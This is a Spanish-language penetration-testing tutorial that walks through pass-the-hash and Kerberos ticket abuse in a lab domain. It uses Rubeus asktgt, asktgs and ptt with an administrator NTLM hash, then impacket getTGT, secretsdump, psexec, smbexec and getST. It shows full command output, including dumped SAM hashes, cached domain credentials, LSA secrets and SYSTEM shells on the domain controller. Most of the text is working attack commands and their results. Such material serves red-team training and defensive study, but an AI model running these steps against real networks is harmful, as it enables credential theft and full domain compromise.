ASK-TGT - TGS
Como hicimos anteriormente lo haremos de la misma forma con esta tecnica para obtener el TGT y posteriormente el TGS, en este caso si hemos capturado el hash del administrador por algun casual podremos obtener el TGT mediante Rubeus como vimos anteriormente de la siguiente forma:
Abrimos una PowerShell como administrador local:
cd C:\Users\empleado1\Desktop\Rubeus-master\Rubeus\bin\Debug
.\Rubeus.exe asktgt /domain:corp.local /user:Administrator /rc4:a87f3a337d73085c45f9416be5787d86Info:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Ask TGT
[*] Using rc4_hmac hash: a87f3a337d73085c45f9416be5787d86
[*] Building AS-REQ (w/ preauth) for: 'corp.local\Administrator'
[*] Using domain controller: 192.168.5.5:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFGDCCBRSgAwIBBaEDAgEWooIELjCCBCphggQmMIIEIqADAgEFoQwbCkNPUlAuTE9DQUyiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCmNvcnAubG9jYWyjggPqMIID5qADAgESoQMCAQKiggPYBIID1IZAFwk1djVdJ60YbiJOQ5ocE2IwlcpJwq5HHKB+g2RTA6LKiDIdH73pCsUj6qjTR8dKJ0SNihj/T/m8SyNuFq36nCI/8NplFms1AEOyYNXMBVM6dKUOZRNn5w8n6ElP6x/wRfTE/hf7gg6J9EhWboAIRL39bYCfHY0r+phVgF6ltkNXkZK9wyb4clnq4hERYceCs6lfdmJ/ElwDAlUurLkDrc5uyEuQZeEmQcUVLvo1ASZZGvtEjsSln/W48KdpCKF9yp+ABqZjZ2LCSRzDayyJMZd3RXc9aSxB0BH/a+wT3ZXVWaD4A2Pb/aaIIXs0kCNau69daOmXSTMT4pgckMhvmEv6G+zcHmRkmbw78Jzf9K/rpqwjqH/bBZiWmkOaofUUTUERUT70WaF/YZZ3tvC7HewScCm0oP+XgDbP/6g3g+HdIzriF0kZKzP8iiadxZSTV53KVwf053m3U5+2SRMb1f+UI8KdnxgCY6cZQb1iqgUamBGnFBKb6lUztcMRa4ddSpM9Ha3b3Uh0Prz1y0pGXb0kmmMYqlc82uGWceyrnkOvNSoDbWVVDXFouvauGQTCtS+nYVhpP1HRbLHH65yW/LDberF5+lP6bMGfxlIR1iNrLzJSDyARi91h5bqvzeN7RX2MuM3T6G8EDSaL93wYCWaV8YZ5Q5cSqWE+vtmqie9aacjek5nmdgJZlLmPzYod69q7XTj0vRIx1CIEJOvoOQC1trm0ojgqKVH3GephZoR0hNlod99/rpkxJqpQ/693C0mmTfDbY3GvYXOxMAVYbs2gjxAi0jLTkXkkp4odM4W79hgI1ORSqgMzHFRHIbbzAX+XOCRx4Njs0hi0+V24ugBUGeSNnq7/qD2WuxU/1yj2tm4Q4b01fw8zr0inZc7gQz/yv007iGJBiT37RihhZdUTe4z7T9+D1Qq6nisdZqafphfqvbSwU2lV/7NWfk2Nu7aspqTClcEgEW+14Amj2jRcPrczitLhfuH4M50g6kaw/X/seTeIkk+yToj3U6MoQc2BBiTgfY35nybyc/4/ElfYcuxMsFWSFNyHObqfoP9K8fNwVsEZUdyJCldUKyvfsutl9LCYLSWTSRBlTUkLYYOgVRgH0gqk8y2ub9uUUFTogSsQxw5Pm08Ud1bpBuGh85dMWmXNKvU+QyUgGNHMR845Wk7M7+IiGm7psNYPnqsdlxj3fbTgPXUV3ArbZQiWujkwKmNehfyNrdhOzTHDjlMmh07SblXi5uc6QHaVB5JlFSFUIIn1k5V1WF3hdfDvxHsKcCsXWr7S0RY/v7OwRfdco4HVMIHSoAMCAQCigcoEgcd9gcQwgcGggb4wgbswgbigGzAZoAMCARehEgQQTG/KoBgwkNXYcvzZHrONhKEMGwpDT1JQLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOEAAKURGA8yMDI1MDEyMjA4MjQ0NVqmERgPMjAyNTAxMjIxODI0NDVapxEYDzIwMjUwMTI5MDgyNDQ1WqgMGwpDT1JQLkxPQ0FMqR8wHaADAgECoRYwFBsGa3JidGd0Gwpjb3JwLmxvY2Fs
ServiceName : krbtgt/corp.local
ServiceRealm : CORP.LOCAL
UserName : Administrator (NT_PRINCIPAL)
UserRealm : CORP.LOCAL
StartTime : 22/01/2025 9:24:45
EndTime : 22/01/2025 19:24:45
RenewTill : 29/01/2025 9:24:45
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : TG/KoBgwkNXYcvzZHrONhA==
ASREP (key) : A87F3A337D73085C45F9416BE5787D86Y vemos que hemos obtenido perfectamente el TGT del usuario Administrador.
Ahora una vez teniendo esto, metemos en un archivo este TGT en una oneline y lo utilizaremos para obtener un TGS de forma manual y que no lo haga de forma automatica Windows.
.\Rubeus.exe asktgs /ticket:doIFGDCCBRSgAwIBBaEDAgEWooIELjCCBCphggQmMIIEIqADAgEFoQwbCkNPUlAuTE9DQUyiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCmNvcnAubG9jYWyjggPqMIID5qADAgESoQMCAQKiggPYBIID1IZAFwk1djVdJ60YbiJOQ5ocE2IwlcpJwq5HHKB+g2RTA6LKiDIdH73pCsUj6qjTR8dKJ0SNihj/T/m8SyNuFq36nCI/8NplFms1AEOyYNXMBVM6dKUOZRNn5w8n6ElP6x/wRfTE/hf7gg6J9EhWboAIRL39bYCfHY0r+phVgF6ltkNXkZK9wyb4clnq4hERYceCs6lfdmJ/ElwDAlUurLkDrc5uyEuQZeEmQcUVLvo1ASZZGvtEjsSln/W48KdpCKF9yp+ABqZjZ2LCSRzDayyJMZd3RXc9aSxB0BH/a+wT3ZXVWaD4A2Pb/aaIIXs0kCNau69daOmXSTMT4pgckMhvmEv6G+zcHmRkmbw78Jzf9K/rpqwjqH/bBZiWmkOaofUUTUERUT70WaF/YZZ3tvC7HewScCm0oP+XgDbP/6g3g+HdIzriF0kZKzP8iiadxZSTV53KVwf053m3U5+2SRMb1f+UI8KdnxgCY6cZQb1iqgUamBGnFBKb6lUztcMRa4ddSpM9Ha3b3Uh0Prz1y0pGXb0kmmMYqlc82uGWceyrnkOvNSoDbWVVDXFouvauGQTCtS+nYVhpP1HRbLHH65yW/LDberF5+lP6bMGfxlIR1iNrLzJSDyARi91h5bqvzeN7RX2MuM3T6G8EDSaL93wYCWaV8YZ5Q5cSqWE+vtmqie9aacjek5nmdgJZlLmPzYod69q7XTj0vRIx1CIEJOvoOQC1trm0ojgqKVH3GephZoR0hNlod99/rpkxJqpQ/693C0mmTfDbY3GvYXOxMAVYbs2gjxAi0jLTkXkkp4odM4W79hgI1ORSqgMzHFRHIbbzAX+XOCRx4Njs0hi0+V24ugBUGeSNnq7/qD2WuxU/1yj2tm4Q4b01fw8zr0inZc7gQz/yv007iGJBiT37RihhZdUTe4z7T9+D1Qq6nisdZqafphfqvbSwU2lV/7NWfk2Nu7aspqTClcEgEW+14Amj2jRcPrczitLhfuH4M50g6kaw/X/seTeIkk+yToj3U6MoQc2BBiTgfY35nybyc/4/ElfYcuxMsFWSFNyHObqfoP9K8fNwVsEZUdyJCldUKyvfsutl9LCYLSWTSRBlTUkLYYOgVRgH0gqk8y2ub9uUUFTogSsQxw5Pm08Ud1bpBuGh85dMWmXNKvU+QyUgGNHMR845Wk7M7+IiGm7psNYPnqsdlxj3fbTgPXUV3ArbZQiWujkwKmNehfyNrdhOzTHDjlMmh07SblXi5uc6QHaVB5JlFSFUIIn1k5V1WF3hdfDvxHsKcCsXWr7S0RY/v7OwRfdco4HVMIHSoAMCAQCigcoEgcd9gcQwgcGggb4wgbswgbigGzAZoAMCARehEgQQTG/KoBgwkNXYcvzZHrONhKEMGwpDT1JQLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOEAAKURGA8yMDI1MDEyMjA4MjQ0NVqmERgPMjAyNTAxMjIxODI0NDVapxEYDzIwMjUwMTI5MDgyNDQ1WqgMGwpDT1JQLkxPQ0FMqR8wHaADAgECoRYwFBsGa3JidGd0Gwpjb3JwLmxvY2Fs /service:cifs/DC01.corp.localY con esto lo que estamos haciendo es solicitar un Ticket de servicio para el servicio cifs del dominio corp.local a nombre del usuario administrador.
Info:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/DC01.corp.local'
[*] Using domain controller: DC01.corp.local (192.168.5.5)
[+] TGS request successful!
[*] base64(ticket.kirbi):
doIFYDCCBVygAwIBBaEDAgEWooIEdjCCBHJhggRuMIIEaqADAgEFoQwbCkNPUlAuTE9DQUyiIjAgoAMCAQKhGTAXGwRjaWZzGw9EQzAxLmNvcnAubG9jYWyjggQvMIIEK6ADAgESoQMCAQOiggQdBIIEGZMwASLu//FjL1fUkKEauSDzFv6K+TZ8+07dFPbrBzCOmFsUgHzpgehBhyw/CCU1zfYGqiQ//bYfUyXhYFfuLHu+GZjfj6icU7PoXQMvG196Sd6kUzpHonWSgj9JVCT92YN78SICzAxeW8zwQ/Yar57FGLy/cjCsG+YZwg2+lwTgHWiRfMH551T2XF2MkvNhO7Kee1DKA4PtwkKVBL+jhIsB4vLImiax7YmX19tQNIL+FVgb2qf4J9SyKET1GX78ooAiTtlktsCS2Y0xDAK1kGCh3W+e8zrYJG0MLxnwoGNsIGfKm2wg6C+Y/r2jeo2IToYKz7ILCWB/Sv8bU2gi0tZbywsFdbKx0gZbbl3pakasQmM4LrgTx/3ZVGsJlmGt13dajbyZwcLBLm2cSXAjilpHpEyl0qxAxWgvjGUla3O4XUBKicOCvFktiCGmMIFGlOSpLYwS9eb1vVxvDNIFtvpMAGuOIDG66QYJZJPqxWw/wMf8If0lRvCo4OmBjzFr9zsmPAuavyEApEFozXpHf0aCgQsGuLFpGo0f/NEiI96TtdVbNTJtK6GbUEPsbQ0gKgA+5PB/JFsnd9CUOvGg3qbCGRgscFnAtTSkHQ0/6efqVfhT3VTI+K2e988jy2YUspVz6Qs+xNuIgdCYZI1ptDtJpHbpPZ5aGwg5m8rTUnTFMUyYJl14SgpoDTkxtS62rfNBMiporzIm8GQESRCXRwTWIiI1lND5zuxwY4RQJMIkUTgUpsE1Pp/ZCcAyqyp5/k3rXD7+LFFVaQYelAEW71tPvOyzolf1zAMaQbLhdxVFiz0EolernQqxJENFx6sYiDDIzA/GA5dcFAlyyGtjubmbxwvaTNIKq8F6xWiQ5ci6cDMvULggdJfYzfKfl3Ukc5LoyPU0m+3ag/+UXwTEMby0Pat/iVBDTzDbB7A3ntW/mrvif02M9i5YlwodEX5f6AfigzOjRRyARnvltE3IoEo61R8TC09C8p7R/GozmQYgSlnt3/pq+H9jxiOEJbNWQIygb2uKlVYFIyUl0AEMBvWGRoDM44WBBMBWpsslJN6qqPCeuySVWp6+LGNihx0FNJrznsW6ou+mt5l2n61zLBc3/htOu9OtxREr5oiqjDrcper8mjSHVLXe7oD+gRF3TsCmGHwHHLCxEf5QwbJsI3/NAuLFqpn3OR2dNro2RPYFewSHU7b0hyy8gZJkqBmvojeMcaaEsc8FdeR5Lv5FT2PKGNfN3k9jXhutZnpazeo9dLh0ufQGuvxjehfNfgPTuzQFPNJL+aYsN5RZgwjUh63Bjum/gMdoBm9sbyv2pZpcHAZlSFjL6Y3QtTze9ipJI4YJyrJeQnGcKzTDDtaAmC6w+5LyJWxUhkj1A0jOI9CseHgHU0aFDfAAo4HVMIHSoAMCAQCigcoEgcd9gcQwgcGggb4wgbswgbigKzApoAMCARKhIgQg9VP015rZTU6O3EM4AZ6ckK8UxpYDLYJdabt7UiqeB9+hDBsKQ09SUC5MT0NBTKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEAlAAClERgPMjAyNTAxMjIwODI2MjRaphEYDzIwMjUwMTIyMTgyNDQ1WqgMGwpDT1JQLkxPQ0FMqSIwIKADAgECoRkwFxsEY2lmcxsPREMwMS5jb3JwLmxvY2Fs
ServiceName : cifs/DC01.corp.local
ServiceRealm : CORP.LOCAL
UserName : Administrator (NT_PRINCIPAL)
UserRealm : CORP.LOCAL
StartTime : 22/01/2025 9:26:24
EndTime : 22/01/2025 19:24:45
RenewTill : 01/01/0001 1:00:00
Flags : name_canonicalize, ok_as_delegate, pre_authent, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 9VP015rZTU6O3EM4AZ6ckK8UxpYDLYJdabt7UiqeB98=Ahora lo que vamos hacer es importarnos este ticket que hemos obtenido con Rubeus de la siguiente forma:
.\Rubeus.exe ptt /ticket:doIFYDCCBVygAwIBBaEDAgEWooIEdjCCBHJhggRuMIIEaqADAgEFoQwbCkNPUlAuTE9DQUyiIjAgoAMCAQKhGTAXGwRjaWZzGw9EQzAxLmNvcnAubG9jYWyjggQvMIIEK6ADAgESoQMCAQOiggQdBIIEGZMwASLu//FjL1fUkKEauSDzFv6K+TZ8+07dFPbrBzCOmFsUgHzpgehBhyw/CCU1zfYGqiQ//bYfUyXhYFfuLHu+GZjfj6icU7PoXQMvG196Sd6kUzpHonWSgj9JVCT92YN78SICzAxeW8zwQ/Yar57FGLy/cjCsG+YZwg2+lwTgHWiRfMH551T2XF2MkvNhO7Kee1DKA4PtwkKVBL+jhIsB4vLImiax7YmX19tQNIL+FVgb2qf4J9SyKET1GX78ooAiTtlktsCS2Y0xDAK1kGCh3W+e8zrYJG0MLxnwoGNsIGfKm2wg6C+Y/r2jeo2IToYKz7ILCWB/Sv8bU2gi0tZbywsFdbKx0gZbbl3pakasQmM4LrgTx/3ZVGsJlmGt13dajbyZwcLBLm2cSXAjilpHpEyl0qxAxWgvjGUla3O4XUBKicOCvFktiCGmMIFGlOSpLYwS9eb1vVxvDNIFtvpMAGuOIDG66QYJZJPqxWw/wMf8If0lRvCo4OmBjzFr9zsmPAuavyEApEFozXpHf0aCgQsGuLFpGo0f/NEiI96TtdVbNTJtK6GbUEPsbQ0gKgA+5PB/JFsnd9CUOvGg3qbCGRgscFnAtTSkHQ0/6efqVfhT3VTI+K2e988jy2YUspVz6Qs+xNuIgdCYZI1ptDtJpHbpPZ5aGwg5m8rTUnTFMUyYJl14SgpoDTkxtS62rfNBMiporzIm8GQESRCXRwTWIiI1lND5zuxwY4RQJMIkUTgUpsE1Pp/ZCcAyqyp5/k3rXD7+LFFVaQYelAEW71tPvOyzolf1zAMaQbLhdxVFiz0EolernQqxJENFx6sYiDDIzA/GA5dcFAlyyGtjubmbxwvaTNIKq8F6xWiQ5ci6cDMvULggdJfYzfKfl3Ukc5LoyPU0m+3ag/+UXwTEMby0Pat/iVBDTzDbB7A3ntW/mrvif02M9i5YlwodEX5f6AfigzOjRRyARnvltE3IoEo61R8TC09C8p7R/GozmQYgSlnt3/pq+H9jxiOEJbNWQIygb2uKlVYFIyUl0AEMBvWGRoDM44WBBMBWpsslJN6qqPCeuySVWp6+LGNihx0FNJrznsW6ou+mt5l2n61zLBc3/htOu9OtxREr5oiqjDrcper8mjSHVLXe7oD+gRF3TsCmGHwHHLCxEf5QwbJsI3/NAuLFqpn3OR2dNro2RPYFewSHU7b0hyy8gZJkqBmvojeMcaaEsc8FdeR5Lv5FT2PKGNfN3k9jXhutZnpazeo9dLh0ufQGuvxjehfNfgPTuzQFPNJL+aYsN5RZgwjUh63Bjum/gMdoBm9sbyv2pZpcHAZlSFjL6Y3QtTze9ipJI4YJyrJeQnGcKzTDDtaAmC6w+5LyJWxUhkj1A0jOI9CseHgHU0aFDfAAo4HVMIHSoAMCAQCigcoEgcd9gcQwgcGggb4wgbswgbigKzApoAMCARKhIgQg9VP015rZTU6O3EM4AZ6ckK8UxpYDLYJdabt7UiqeB9+hDBsKQ09SUC5MT0NBTKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEAlAAClERgPMjAyNTAxMjIwODI2MjRaphEYDzIwMjUwMTIyMTgyNDQ1WqgMGwpDT1JQLkxPQ0FMqSIwIKADAgECoRkwFxsEY2lmcxsPREMwMS5jb3JwLmxvY2FsInfo:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Import Ticket
[+] Ticket successfully imported!Y vemos que se nos importo de forma correcta, si hacemos klist podremos ver lo siguiente:
El id. de inicio de sesión actual es 0:0x68992
Vales almacenados en caché: (1)
#0> Cliente: Administrator @ CORP.LOCAL
Servidor: cifs/DC01.corp.local @ CORP.LOCAL
Tipo de cifrado de vale Kerberos: AES-256-CTS-HMAC-SHA1-96
Marcas de vale 0x40250000 -> forwardable pre_authent ok_as_delegate name_canonicalize
Hora de inicio: 1/22/2025 9:26:24 (local)
Hora de finalización: 1/22/2025 19:24:45 (local)
Hora de renovación: 0
Tipo de clave de sesión: AES-256-CTS-HMAC-SHA1-96
Marcas de caché: 0
KDC llamado:Vemos que tenemos un ticket de servicio, justo el que especificamos cifs, como el usuario administrador.
Ahora vamos hacer el mismo proceso pero desde Linux para poder ver varias tecnicas que hay.
TGT/TGS desde Linux a Windows
Vamos a realizar la misma tecnica para el TGT como vimos anteriormente en linux de la siguiente forma:
impacket-getTGT corp.local/Administrator -hashes :a87f3a337d73085c45f9416be5787d86Info:
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Administrator.ccacheUna vez que ya tengamos el TGT en el archivo Administrator.ccache guardado, haremos lo siguiente.
Si nosotros vemos el help de la herramienta impacket pero de un parametro en concreto, veremos lo siguiente entre tanta linea:
impacket-secretsdump -hInfo:
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command lineVemos que con el -k utilizara el portocolo kerberos que es el que queremos pero cogiendo como variable de entorno el TGT que tiene que estar en la palabra KRB5CCNAME, por lo que le tendremos que asignar a dicha variable de entorno el TGT que acabamos de obtener con la anterior herramienta para que lo coja de forma automatica sin necesidad de pasarle nada.
export KRB5CCNAME=/home/kali/Administrator.ccacheUna vez echo esto, haremos lo siguiente:
impacket-secretsdump corp.local/Administrator@WS01.corp.local -k -no-passInfo:
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xc8125866b327df176940c9f2d6a48f5f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:5ed544e71abe56b376b7993b21946520:::
santiago:1001:aad3b435b51404eeaad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6:::
[*] Dumping cached domain logon information (domain/username:hash)
CORP.LOCAL/empleado1:$DCC2$10240#empleado1#fda53d6158406f827388476bcbc97c37: (2025-01-20 09:22:18)
CORP.LOCAL/Administrator:$DCC2$10240#Administrator#e1c8d7e26653ae629a74772a389cf7e6: (2025-01-21 09:28:20)
CORP.LOCAL/annice.mable:$DCC2$10240#annice.mable#77702054bffe13f7c5bbe919a228d985: (2025-01-12 11:36:13)
CORP.LOCAL/angelika.shelly:$DCC2$10240#angelika.shelly#835512d4e4bb1d962c57d290eb99f670: (2025-01-12 16:51:40)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CORP\WS01$:plain_password_hex:5700320055006b0049004e0027003d005e0055005c00750052004c0077006e004e00510045003c002d0066005d004b005f007600330072004400350022002700750068004e00300041003d0024006c004e0022005700750065006b00640034004a0056006f003e006c005f006c0050005c005d002700360077002c00290033005e005d004f005e005100560027002e003200380029004f0078005100410049002c003a0025005f00680072005d00380034002500490068002200640045006f0072005c0063002d0022005f002f006f0065006700720022005f0061006c00780047006400590062007700770059005f00
CORP\WS01$:aad3b435b51404eeaad3b435b51404ee:afc5c02d936d73808ce716070e883ab8:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x6be6aee6bc489e7fab1ed9a63b1aa5c0d2f13fef
dpapi_userkey:0xb83f8122ee552579d8fbf4d9b304ae19ab5bb7af
[*] NL$KM
0000 5C B5 3B 8C D5 28 A0 C3 6A F2 57 A3 08 B6 F7 D4 \.;..(..j.W.....
0010 E4 7D 11 84 8F 2C 98 2B 2D DD 06 7D 30 53 B4 23 .}...,.+-..}0S.#
0020 4B 8D C7 7E 92 96 5B 48 67 29 99 50 C1 E4 27 A6 K..~..[Hg).P..'.
0030 37 2C 9D 99 E8 FD 57 11 CC 44 47 ED 30 6F 96 00 7,....W..DG.0o..
NL$KM:5cb53b8cd528a0c36af257a308b6f7d4e47d11848f2c982b2ddd067d3053b4234b8dc77e92965b4867299950c1e427a6372c9d99e8fd5711cc4447ed306f9600
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistryVemos que ha funcionado correctamente sin necesidad de meter contraseña, solo simplemente con el TGT del usuario administrador.
Si por ejemplo nos queremos conectar de forma remota al DC01 con el TGT sin contraseña, podremos hacerlo de la siguiente forma:
impacket-psexec corp.local/Administrator@DC01.corp.local -k -no-passInfo:
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on DC01.corp.local.....
[*] Found writable share ADMIN$
[*] Uploading file OmCmqyOF.exe
[*] Opening SVCManager on DC01.corp.local.....
[*] Creating service CJGu on DC01.corp.local.....
[*] Starting service CJGu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.1]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemY con esto ya estaremos dentro del DC01 con el usuario SYSTEM basicamente el nivel mas alto de privilegios, solamente teniendo el TGT.
Tambien podriamos hacerlo de la misma forma pero meidante SMB.
impacket-smbexec corp.local/Administrator@DC01.corp.local -k -no-passInfo:
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\systemDe la misma forma podremos obtener un Ticket de servicio con la herramienta impacket de la siguiente forma:
impacket-getST -spn cifs/DC01.corp.local -no-pass -k corp.local/AdministratorInfo:
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting ST for user
[*] Saving ticket in Administrator@cifs_DC01.corp.local@CORP.LOCAL.ccacheY con esto ya obtendremos el Ticket de servicio guardado en el archivo Administrator@cifs_DC01.corp.local@CORP.LOCAL.ccache.
Last updated